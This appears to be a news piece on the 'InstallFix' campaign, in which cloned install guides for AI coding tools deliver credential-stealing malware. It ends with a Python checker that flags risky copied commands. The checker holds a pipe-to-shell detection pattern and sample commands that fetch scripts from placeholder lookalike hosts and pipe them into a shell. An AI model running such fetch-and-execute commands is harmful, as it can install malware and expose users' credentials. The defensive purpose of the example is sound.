Malware Hides in AI Coding Guides
7 Mar
Summary
- New 'InstallFix' scam targets AI coders using fake installation guides.
- Malware is downloaded when users follow malicious links in fake guides.
- The scam targets user data, including passwords and session tokens.

A sophisticated malware scheme known as InstallFix is actively targeting aspiring coders, particularly those experimenting with AI tools like Claude Code. The attackers create deceptive websites that mimic genuine installation guides and that appear in search engine results. The scam exploits user trust by embedding malicious links within these fake guides. Users are vulnerable at the moment they start the installation, because the attack often involves pasting commands into their terminal from a source they believe to be trustworthy.

These cloned sites meticulously replicate legitimate platforms, including logos and layout, making them difficult to distinguish from the originals. However, the download links on the fake sites point to attacker-controlled servers, enabling the distribution of malware that often evades standard anti-malware software. The initial executable downloaded by the user then fetches additional malicious payloads from remote URLs.

Evidence suggests this malware is linked to the Amatera Stealer, which focuses on exfiltrating user credentials, cookies, and session tokens and proves challenging to eradicate. While this specific campaign focuses on Claude Code, the InstallFix technique is expected to spread as AI tools gain popularity, drawing in novice users.
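Because the fake guides differ from the real ones mainly in where their links point, a copied command can be vetted before it is pasted into a terminal. The following is an added example, not code from the article or from any vendor: it checks every URL in a command against an allow-list, and it goes slightly beyond the article by also flagging pipe-to-shell installs, lookalike hostnames and the `user@host` URL form. `TRUSTED_HOSTS`, `review_command` and all `.example` hostnames are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts you have confirmed in the vendor's own documentation.
# "downloads.vendor.example" is a placeholder, not a real install host.
TRUSTED_HOSTS = frozenset({"downloads.vendor.example"})

URL_RE = re.compile(r"https?://[^\s'\"|;<>)]+", re.IGNORECASE)
# Fetched content handed straight to an interpreter (curl ... | sh, iwr ... | iex).
PIPE_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:(?:ba|z|da)?sh|iex|invoke-expression)\b",
                     re.IGNORECASE)


def review_command(command, trusted=TRUSTED_HOSTS):
    """Return (code, detail) findings for a copied command; empty list = no flags."""
    findings = []
    if PIPE_RE.search(command):
        findings.append(("pipe-to-shell", "download runs without being inspected"))
    for url in URL_RE.findall(command):
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").lower().rstrip(".")
        except ValueError:  # malformed authority, e.g. unbalanced IPv6 brackets
            findings.append(("unparseable-url", url))
            continue
        if parts.scheme.lower() != "https":
            findings.append(("plain-http", host))
        if parts.username is not None:
            # https://trusted-name@other-host/ really connects to other-host
            findings.append(("userinfo-in-url", parts.username))
        if host not in trusted:
            lookalike = any(t in host for t in trusted)
            findings.append(("lookalike-host" if lookalike else "untrusted-host", host))
    return findings


# Constructed sample commands, not taken from the campaign.
SAMPLES = [
    "curl -fsSL https://downloads.vendor.example/install.sh -o install.sh",
    "curl -fsSL https://downloads.vendor.example.cdn-mirror.example/install.sh | bash",
    "curl -fsSL https://downloads.vendor.example@files.example/i.sh | sh",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(cmd, "->", review_command(cmd) or "no flags")
```

An empty result only means the command fetches from hosts on your allow-list; the allow-list itself has to come from the vendor's documentation reached by a typed or bookmarked address, not from a search result.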




